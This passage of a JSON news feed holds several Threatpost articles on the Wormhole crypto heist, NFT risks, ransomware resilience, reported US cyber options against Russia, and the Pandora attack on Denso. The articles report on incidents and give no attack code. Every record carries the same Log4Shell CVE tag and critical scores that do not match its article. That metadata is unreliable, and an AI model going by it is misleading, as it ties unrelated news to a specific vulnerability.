\u201cIt teaches about using bug checking tools, using coding tools that automatically rule out as many security bugs as they can, and in general, puts security into the whole lifecycle of developing something, be it a traditional program, smart phone app or smart contract.\u201d\n\nBut there\u2019s a bigger underlying problem, he noted: Namely, most developers and smart contract creators, aren\u2019t trained in SDL and \u201cget little to no training in secure development. So, these sorts of bugs are going to creep in and bad actors are going to take advantage of them.\u201d\n\nOne thing to note is that the cryptocurrency world is full of trillions of dollars, but it\u2019s still at the toddler stage. \u201cIt is an immature industry using immature code, and like all new industries, it is moving ahead at warp speed, good security be damned,\u201d Grimes said.\n\nWhereas it\u2019s getting harder for bad actors and bug hunters to find really good exploits in Microsoft Windows, Macs, Linux and Google ChromeOS, these platforms are maturing, making it tougher to pull them apart, he said. That includes the experienced coders, tools and the protective mechanisms of the operating systems themselves.\n\nNot so with the cryptocurrency world, Grimes said, which is the mirror opposite.\n\n\u201cIt is built on very secure protocols and algorithms, but then a lot of very immature and buggy applications are built on top of it,\u201d he observed.\n\nHe compared it to putting your door key in your potted plant in front of the door: \u201cSometimes all a thief has to do is look. And that is what hackers exploiting cryptocurrency are doing. They are taking their traditional methods for hunting bugs and using them against immature cryptocurrency applications. And viola, they are finding lots of exploitable bugs.\u201d\n\nAnd once the money\u2019s gone bye-bye, it\u2019s tough to claw it back. \u201cThe exploits always result in stolen money, which are hard to track to and [identify], and almost always impossible to reverse, even if you are watching it in real time,\u201d Grimes said.\n\nHe predicted that after suffering billions of dollars in pain, the cryptocurrency world \u201cwill mature and it will become harder for hackers to find the easy pickings.\u201d\n\nToo bad the lessons are so painful, Grimes said: \u201cYou always hope that when the next cool digital thing happens that we will better apply the security lessons learned from the previous platforms. But we always seem to want there to be more digital blood on the ground than there needs to be. We always, over and over, want to learn the hard way. Each new computing platform is like we have learned nothing at all.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T18:28:14", "type": "threatpost", "title": "Wormhole Crypto Platform: 'Funds Are Safe' After $314M Heist", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T18:28:14", "id": "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "href": "https://threatpost.com/wormhole-crypto-funds-safe-heist/178189/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T14:20:09", "description": "Why in the world would a collection of nonfungible token (NFT) gorilla avatars called the Bored Ape Yacht Club (BAYC), run by 30-somethings using aliases like \u201cEmperor Tomato Ketchup\u201d and \u201cNo Sass\u201d and [adored by celebrities](<https://www.vanityfair.com/news/2022/02/bored-ape-yacht-club-revealed>), spiral on up to a [multibillion-dollar valuation](<https://www.coingecko.com/en/nft/bored-ape-yacht-club>) (\u2026and, by the way, how can you yourself get stinking crypto-rich?!)?\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30153635/Bored-Ape-Yacht-Club-NFT-scaled-e1648669046321.jpeg>)\n\nImage of Bored Ape Yacht Club NFT.\n\nIf you don\u2019t have a clue, you might be one of the crypto-newbies for whom the New York Times recently pulled together its [Latecomer\u2019s Guide to Crypto](<https://www.nytimes.com/interactive/2022/03/18/technology/cryptocurrency-crypto-guide.html>) and whom [mutual funds companies](<https://www.fidelity.com/viewpoints/active-investor/beyond-bitcoin>) are trying to [ease into](<https://economictimes.indiatimes.com/markets/cryptocurrency/crypto-investment-in-mutual-funds-style-mudrex-launches-coin-sets/articleshow/87099763.cms?from=mdr>) the brave new world.\n\nYou also might have a thousand questions that go beyond cartoon apes and get into the nitty-gritty of how cryptocurrency and blockchain technologies work and how to sidestep the associated cybersecurity risks.\n\nThose risks are big, throbbing realities. The latest: Ronin, an Ethereum-linked blockchain platform for NFT-based video game Axie Infinity, on Tuesday put up a [blog post](<https://roninblockchain.substack.com/p/community-alert-ronin-validators?s=w>) advising that 173,600 ether tokens and 25.5 million USD coins \u2013 valued at nearly $620 million as of Tuesday \u2013 had been drained from its platform after an attacker used hacked private keys to forge two fake withdrawals last week.\n\nAccording to [Forbes](<https://www.forbes.com/sites/jonathanponciano/2022/03/29/second-biggest-crypto-hack-ever-600-million-in-ethereum-stolen-from-nft-gaming-blockchain/?sh=280f0f0c2686>), blockchain analytics firm Elliptic pegs it as the second-biggest hack ever.\n\n## New Technology, Old Hacks\n\nCryptocurrency and related technologies may be shiny new concepts, but the techniques crooks are using to drain them aren\u2019t necessarily newfangled. As of its Wednesday update, Ronin said that it looks like the breach was pulled off with old-as-the-hills social engineering:\n\n> \u201cWhile the investigations are ongoing, at this point we are certain that this was an external breach. All evidence points to this attack being socially engineered, rather than a technical flaw.\u201d \u20143/30/22 Ronin alert.\n\nDr. Lydia Kostopoulos, senior vice president of emerging tech insights at [KnowBe4](<https://www.knowbe4.com/>), stopped by the Threatpost podcast to give us an overview of this brave new world of blockchain: a landscape of new technologies that are making wallets swell and shrink and hearts to flutter in dismay when such things as the Ronin hack transpire.\n\nShe shared her insights into everything from how such technologies work to what the associated cybersecurity risks are, including:\n\n * How blockchain technologies, including NFTs, work.\n * The cybersecurity risks that might emerge from the use of NFTs/cryptocurrency, including popular scams/social engineering attempts circulating today.\n * Steps individuals/businesses can take to protect themselves.\n * What is driving their popularity and if NFTs are here to stay.\n * Regulations on blockchain technology.\n\nYou\u2019ve heard it a thousand times before, but Dr. Kostopoulos says it\u2019s real: Blockchain technology is transformative. Look out for state-backed currencies and blockchain-enabled voting that can\u2019t be tampered with, for starters. Look for NFT invitations to artists\u2019 performances that keep giving as those artists reward their ticket holders with future swag. And for the love of Pete, don\u2019t lose your cold wallets if you want to keep your crypto safe.\n\nIf you don\u2019t yet know what a cold wallet is, definitely have a listen!\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/032522_KnowBe4_Lydia_mixdown_2.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T13:00:09", "type": "threatpost", "title": "A Blockchain Primer and Bored Ape Headscratcher \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T13:00:09", "id": "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "href": "https://threatpost.com/a-blockchain-primer-and-a-bored-ape-headscratcher-podcast/179179/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-24T21:18:33", "description": "In part one of [this series](<https://threatpost.com/harsh-truths-cybersecurity-tips/178311/>), I outlined some harsh truths of cybersecurity in 2022 and the first three of the top six steps you should take to ensure resiliency against today\u2019s most pervasive threat\u2014ransomware. Here, I\u2019ll cover the remaining three:\n\nBut first, let\u2019s take a quick step back.\n\nIt used to be that ransomware would get into a system, start encrypting and downloading as much as it could, and then escape before it was detected. But ransomware and the cybercriminals behind it have now evolved.\n\nMimicking the art of \u201ccasing the joint,\u201d they get in, do cyber-reconnaissance, lurk until the optimal time to inflict maximum impact, and then they strike. This practice of remaining undetected for a period of time is often referred to as dormant ransomware, and it is now a regular occurrence.\n\nBad actors are highly motivated to cause as much destruction as possible to make more money and maximize their efforts \u2014 just as with any business, it\u2019s all about ROI. Some reports suggest that ransomware sometimes lays dormant for up to 18 months. The bad actors know that optimal destruction depends on multiple factors, such as timing and scope. They want you to have no other choice but to pay the ransom.\n\nIn short, the old days of a breach and attack happening at the same time are long gone. This added complexity means that cybercriminals often know your systems better than even you do. Therefore, the chance that they launch a series of events designed to disrupt and disable critical systems to net larger payouts is rising drastically.\n\nSo, what should you do today to combat this new dormant ransomware and cyber-recon strategy? In the first part of this series, I discussed:\n\n * Get Full Infrastructure Awareness\n * Automate Alerts for Anomalous Behavior\n * Limit Access &amp; Reduce Your Attack Surface\n\nWithout further ado, here are the remaining three of the top six steps to ensure ransomware resiliency.\n\n## **Make Resiliency &amp; Rapid Recovery Your Goal**\n\nWith the mindset that bad actors are already in your system, resiliency and rapid recovery should become the ultimate goal. We are talking about so much more than just a restore point, a single backup copy or making multiple copies. You must architect an optimized and simplified recovery experience that will help you get back up and running quickly, even at scale.\n\nTruly optimizing for the recovery experience requires careful planning, orchestration, recovery options, cross-functional alignment and training, storage deduplication efficiencies, and global visibility and oversight. Having solutions that provide recovery from anywhere to anywhere, and flexibility and choice in the event of an attack or disaster, is critical.\n\nWhy? Well, cyberattacks are never one size fits all. Sometimes everything is impacted and you may need to recover an entire data center in the cloud and on demand. On the other hand, maybe not all your environment is impacted, just a portion; having solutions in place that allow you to grab individual databases and files to recover back quickly into production can be vital. In the case where entire servers become encrypted, you may need to quickly recover those entire servers elsewhere. Or maybe you just need to recover a large amount of virtual machines back to production.\n\n_**Important reminder:** _Not all tools provide this level of flexibility. It is important to think through all of the scenarios and choose the right solution. And remember, multiple disparate backup solutions create a complicated recovery experience, especially when multiple systems are compromised. Simplify and streamline by reducing the number and variety of point products and vendors across your organization.\n\n## **Use Immutable &amp; Indelible Storage to Keep Backups Safe**\n\nI recommend the 3-2-1+1 methodology of data backup. That means at least three copies of your data on at least two distinct mediums with at least one offsite or segregated \u2014 and, have at least one of those copies on immutable and indelible storage.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/16090743/321-Backup.png>)You can implement technology to help you easily and automatically execute a 3-2-1+1 methodology that ensures no single point of failure, by configuring lifecycle policies that send data over to a secondary or even tertiary domain. Look for technology that can send your data unidirectionally to a secure second location that can have different credentials configured and limited network capabilities, ensuring proper segmentation of your data protection environment. Even better are tools that can also send a copy of de-duplicated immutably stored data to the cloud.\n\n_**Important reminder:** _Immutable and indelible storage helps ensure that your data cannot be changed, encrypted or deleted for a determined length of time, or at all. At first, make immutable storage your second copy, but once you get comfortable with your retention policies, make it your primary copy.\n\n## **Rehearse Your Recovery**\n\nCybercriminals hope that your organization is like most \u2014 not optimized for recovery. They want maximum damage and downtime to ensure they get paid. If you are ready and have rehearsed your recovery, you are a huge step ahead.\n\nTo get to rapid recovery, you must have a cybersecurity response plan for your entire environment that includes testing early and often. Yes, regular rehearsals of your recovery help to limit downtime and disruptions and reduce the impact of an attack. Look for technology that makes it easy and efficient to execute non-disruptive tests leveraging non-production resources such as fenced networks and sandbox environments.\n\nAlso, rehearse recovering everything, and not just a subset of your applications, including things like your domain, authentication, system time and other infrastructure services, as you will likely be recovering most or all of your production environment in the event of an actual attack.\n\n_**Important reminder:** _Regular rehearsal and validation are vital for success because when you are in crisis mode, things just need to work.\n\nIn closing, one final harsh truth: It will get worse. Cybercriminals are sophisticated, well-funded and here to stay. Ransomware-as-a-service vendors exist in large numbers and have successfully transitioned to a highly profitable business model with the charter of successfully crippling organizations at their most vulnerable times to maximize ransoms. These businesses provide turnkey code, have advanced support networks with helplines, and provide tools for encryption, communicating with victims and facilitating ransom collection.\n\nIn addition to the dormant ransomware trend, we have already seen a vast influx of zero-day attacks in 2022. Along with patching and updating software regularly, it is also important to prioritize educating your employees across your entire organization. Zero-day attacks often capitalize on human error.\n\nThe good news is that you can be one step ahead of cybercriminals with the proactive steps outlined in this two-part series, diligence and some creative thinking.\n\n**_Sonya Duffin is a ransomware and data protection expert at [Veritas Technologies](<https://www.veritas.com/>)._**\n\n_**Enjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/>).**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T21:11:33", "type": "threatpost", "title": "The Harsh Truths of Cybersecurity in 2022, Part Two", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T21:11:33", "id": "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "href": "https://threatpost.com/harsh-truths-cybersecurity-part-two/178447/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T00:38:55", "description": "The White House has denied reports that President Biden has been [presented](<https://www.nbcnews.com/politics/national-security/biden-presented-options-massive-cyberattacks-russia-rcna17558>) with an arsenal of ways to launch massive cyberattacks against Russia \u2013 attacks designed to disrupt the country\u2019s ability to sustain its military operations in Ukraine.\n\nNBC News on Thursday reported that the options included \u201cdisrupting internet connectivity across[ Russia](<https://www.nbcnews.com/news/world/russia-launches-attacks-key-ukrainian-cities-rcna17482>), shutting off electric power, and tampering with railroad switches to hamper Russia\u2019s ability to resupply its forces.\u201d\n\nRussia\u2019s military forces have been deployed in a \u200bfull-scale [attack](<https://www.washingtonpost.com/world/2022/02/24/russia-ukraine-attack-news/>) against Ukraine.\n\nWithin hours of the report, press secretary Jen Psaki said in a[ tweet](<https://twitter.com/PressSec/status/1496919281535111211>) that NBC got it wrong: \u201cThis report on cyber options being presented to[ @POTUS](<https://twitter.com/POTUS>) is off base and does not reflect what is actually being discussed in any shape or form,\u201d she said.\n\n> This report on cyber options being presented to [@POTUS](<https://twitter.com/POTUS?ref_src=twsrc%5Etfw>) is off base and does not reflect what is actually being discussed in any shape or form.\n> \n> \u2014 Jen Psaki (@PressSec) [February 24, 2022](<https://twitter.com/PressSec/status/1496919281535111211?ref_src=twsrc%5Etfw>)\n\nThe outlet\u2019s sources \u2013 \u201ctwo U.S. intelligence officials, one Western intelligence official and another person briefed on the matter\u201d \u2013 told NBC that no final decisions had been made as of earlier on Thursday.\n\nOne of those sources said the possibilities range from the aggravating to the destructive: \u201cYou could do everything from slow the trains down to have them fall off the tracks,\u201d said the source, who\u2019d been briefed on the matter.\n\nBut that source also said that most of the potential measures on the slate of possible cyberattacks (a slate that, again, press secretary Psaki said was inaccurate) wouldn\u2019t be destructive but would, rather, be designed to be disruptive, hence falling short of an act of war by the United States against Russia, according to NBC.\n\n## Would the U.S. Be Prepared for Retaliation?\n\nNBC\u2019s sources said that the purported slate of cyberattack options were allegedly presented irrespective of the likelihood that Russia would retaliate.\n\nAnd retaliate it would, cybersecurity experts predicted, whether in response to sanctions, to any arms/material support the United States may choose to send to the Ukrainian resistance, or to whatever cyberattacks the country might launch.\n\nMark Moses, director of client engagement at application security provider nVisium, told Threatpost via email on Thursday that Russian cyberattacks against critical U.S. infrastructure and economic assets \u201cwill escalate rapidly if the United States takes a real stance against the annexation of Ukraine to Russia.\u201d\n\nIn fact, government outfits and key businesses should already be bolstering defenses and ensuring that redundant systems are in place, he said, as defense against state-level actors \u201cis at another level from defense against the average Internet threat actor.\u201d\n\nThere\u2019s already been a swirl of malicious cyber-action that\u2019s coincided with Russia\u2019s deployment of troops to Ukraine.\n\nOn Tuesday, a wave of distributed denial-of-service (DDoS) attacks [hit institutions](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) central to Ukraine\u2019s government, military and economy, including banks.\n\nIn addition, Cybersecurity firms [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom\u2019s [Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) earlier this week reported that new data-wiping malware, dubbed [HermeticWiper](<https://twitter.com/juanandres_gs/status/1496581710368358400>), was discovered on hundreds of machines on Ukrainian networks.\n\nIn a Thursday [post](<https://www.digitalshadows.com/blog-and-research/russia-invades-ukraine-what-happens-next/>), the Digital Shadows Photon Research team noted that researchers found that in some cases the malware had been compiled in December 2021, \u201cindicating that the attack had been prepared in advance.\u201d [ Other research](<https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/>) identified that HermeticWiper was deployed directly from Windows domain controllers, indicating [it\u2019s] realistically possible that attackers may have had prolonged access prior to execution.\u201d\n\nHitesh Sheth, President and CEO at cybersecurity company Vectra, told Threatpost that it\u2019s \u201cimperative\u201d for the United States\u2019 organizations and government bodies to fortify defenses while the government considers offensive options. \u201cGoing on the offensive without the right technology to defend ourselves in cyber space would be bad strategy,\u201d he declared.\n\nJohn Hellickson, field CISO and executive advisor at cybersecurity advisory services provider Coalfire, agreed that retaliation by Russia could have \u201cdevastating\u201d impacts on essential services in the United States. He told Threatpost via email on Thursday that we\u2019ve still got a lot of work here at home to ensure that such retaliatory attacks could be sufficiently thwarted, \u201cas evidenced by very public ransomware and similar attacks of recent.\u201d\n\nHellickson preached caution: \u201cWe need to avoid crossing the line of such considerations as it\u2019s difficult to predict the impacts of a likely retaliation,\u201d he advised.\n\n## More to Come\n\nDigital Shadows is foretelling that Russia will launch yet more malicious cyber-action targeting Ukraine. Cyberattacks could extend beyond Ukraine, researchers predicted, with future attacks potentially affecting NATO and EU member states.\n\n\u201cThis has already been observed with HermeticWiper impacting networks in Latvia and Lithuania,\u201d Digital Shadows pointed out. The researchers compared the situation to the 2017 global [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) attacks: attacks allegedly tied to Russian military intelligence.\n\n\u201cIt is also realistically possible that the financial services, energy, and oil &amp; gas sectors in particular are under an increased risk from Russian aligned threat actors,\u201d Digital Shadows suggested. \u201cTargeting oil &amp; gas in Europe, for example, could serve to cause concern among nation-states dependent on Russian energy.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T00:29:32", "type": "threatpost", "title": "White House Denies Mulling Massive Cyberattacks Against Russia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T00:29:32", "id": "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "href": "https://threatpost.com/white-house-denies-mulling-massive-cyberattacks-against-russia/178658/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-15T13:03:28", "description": "A multibillion supplier to key automotive companies like Toyota, Mercedes-Benz and Ford confirmed Monday that it was the target of a cyberattack over the weekend \u2013 confirmation that came after the Pandora ransomware group began leaking data that attackers claimed was stolen in the incident.\n\nThe attack on Japan-based Denso occurred at a company office in Germany, which was \u201cillegally accessed by a third party on March 10,\u201d the company said in [a press statement](<https://www.denso.com/global/en/news/newsroom/2022/20220314-g01/>) on its website.\n\n\u201cAfter \u2026 detecting the unauthorized access, Denso promptly cut off the network connection of devices that received unauthorized access and confirmed that there is no impact on other Denso facilities,\u201d the company said in the statement.\n\nDenso is one of the world\u2019s largest suppliers of automotive components \u2013 including powertrain control and electronics parts \u2013 to top automobile brands such as Toyota, Mercedes-Benz, Ford, Honda, Volvo, Fiat and General Motors. The Japan-based supplier reported $44.6 billion in revenue last year and has more than 200 subsidiaries with 168,391 employees worldwide.\n\nDenso is currently investigating the incident with appropriate authorities and production continues at \u201call plants as usual,\u201d according to the statement.\n\n## **Toyota Data Leaked**\n\nHowever, classified information from Toyota stolen in the attack on Denso already has been leaked on the dark web by Pandora, according to Japanese security firm Mitsui Bussan Secure Directions.\n\nThe company told [Japanese news outlet NHK](<https://www3.nhk.or.jp/nhkworld/en/news/20220313_23/>) that Pandora posted a message on the dark web on Sunday afternoon, Japan time, claiming to have stolen more than 157,000 items amounting to 1.4 terabytes of data belonging to the Toyota Motor group. This is the second time in a few weeks that Toyota has been hit: In late February, the car maker was forced to [close down](<https://threatpost.com/toyota-to-close-japan-plants-after-suspected-cyberattack/178686/>) its Japan plants after a suspected cyberattack.\n\nOn Saturday, Eastern time, the dark-web criminal intelligence firm DarkTracer [tweeted](<https://twitter.com/darktracer_int/status/1502871181556211721?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1502871181556211721%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bankinfosecurity.com%2Ftoyota-parts-supplier-denso-confirms-ransomware-attack-a-18716>) a screenshot of the Denso listing on Pandora\u2019s leak portal. Reports said that the dump includes purchase orders, emails, non-disclosure agreements, technical drawings and other classified information.\n\n> [ALERT] Pandora gang has announced \"DENSO\" on the victim list. [pic.twitter.com/kh9wzGV1io](<https://t.co/kh9wzGV1io>)\n> \n> \u2014 DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) [March 13, 2022](<https://twitter.com/darktracer_int/status/1502871181556211721?ref_src=twsrc%5Etfw>)\n\nOn Monday, DarkTracer [added](<https://twitter.com/darktracer_int/status/1503521358436872193>) that the Rook gang listed Denso on its victim list a few months ago, in December 2021.\n\n> DENSO was listed on the victim list by ROOK in December 2021 and Pandora ransomware gang in March 2022. [pic.twitter.com/tFcRP0iSx3](<https://t.co/tFcRP0iSx3>)\n> \n> \u2014 DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) [March 15, 2022](<https://twitter.com/darktracer_int/status/1503521358436872193?ref_src=twsrc%5Etfw>)\n\nIt\u2019s unclear at this time if Pandora managed to encrypt files before the most recent attack was detected, nor how much, if any, ransom is being demanded, according to reports. The one-two punch of both encrypting files and then threatening to leak or actually leaking files is a known ransomware tactic dubbed [\u201cdouble extortion.\u201d](<https://threatpost.com/mount-locker-ransomware-changes-tactics/165559/>)\n\n## **Supply-Chain Under Attack**\n\nThe Denso attack is the second supply-chain cyber incident that has impacted Toyota this year. In February, [an attack on Toyota supplier Kojima Industries Corp](<https://threatpost.com/toyota-to-close-japan-plants-after-suspected-cyberattack/178686/>). forced the company to shut down its Japanese plants.\n\nThese incidents demonstrate the danger of attacks to the supply chain of multinational organizations, stressing the need to maintain and manage the same security at the principal company across all partners and business units, one security professional said.\n\n\u201cCybercriminals will always exploit the weakest link, and in today\u2019s interconnected networks can do significant damage from compromising even a small business unit,\u201d Chris Clements, vice president of solutions architecture at security firm [**Cerberus Sentinel**](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PafO3_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYMJWuG5OA4-2BOZVBWk67VVuirlpGqvvjOXpBF3L7YyXmgDicFNnin5X9cffMU5tz5sAvRLImOfXwTT9u9-2FFH7xzyri9Y9AhWFE2dmrkAU8E2kn12zI2BdfTSHHXU9lg6mTJmz7yfpOLHFgsLlFN24bpzc1Kk4Xrvjw-2BEXtWSMBRNfWVwwirbw4h3nPn3SgKzb5aH5KhjDKycPmCLx4O3XW8D7pUZQ0iU5KLwWJv0SpW-2FM-3D>), wrote in an email to Threatpost on Monday. \u201cIt\u2019s no longer enough for businesses to solely focus on their ability to prevent or recover from a ransomware attack as attackers now routinely steal mass quantities of data as part of their operations.\u201d\n\nIndeed, the data theft involved in double-extortion attacks can be even more dangerous than simply a traditional encryption-based ransomware attack due to the unpredictability of attackers once they get their hands on sensitive and proprietary information, he noted.\n\n\u201cThere is no way to verify that the attacker will actually delete the information instead of attempting to resell it on the dark web or simply release it publicly,\u201d Clements said.\n\n## **Emerging Ransomware Threat**\n\nThe Pandora group is relatively new on the ransomware scene, emerging earlier this month as a new player in the threat landscape that uses this dangerous method of double extortion to blackmail targets.\n\nPandora\u2019s designers have developed the ransomware to encrypt sensitive files to restrict access by appending the _.pandora_ extension to filenames to prevent victims from opening affected files, according [to research](<https://malwarewarrior.com/how-to-remove-pandora-ransomware/>) from Malware Warrior.\n\nSince Pandora is such a new threat, it\u2019s not yet known how cybercriminals breach corporate networks to infect systems with the ransomware. However, clues might be found in previously active ransomware groups and their methods, researchers said.\n\nOne security researcher with the Twitter handle pancak3 [believes](<https://twitter.com/pancak3lullz/status/1503201831303983108>) Pandora is a re-branding of [Rook](<https://www.sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk/>) ransomware, which in turn borrows code from [Babuk ransomware](<https://threatpost.com/babuk-ransomware-washington-dc-police/165616/>). That [now-defunct ransomware-as-a-service (RaaS)](<https://threatpost.com/babuk-ransomware-gang-mulls-retirement/165742/>) group \u2013 which is likely selling its services for other cybercriminals to use \u2013 also used double extortion in its attacks during its heyday.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-15T12:58:59", "type": "threatpost", "title": "Pandora Ransomware Hits Giant Automotive Supplier Denso", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 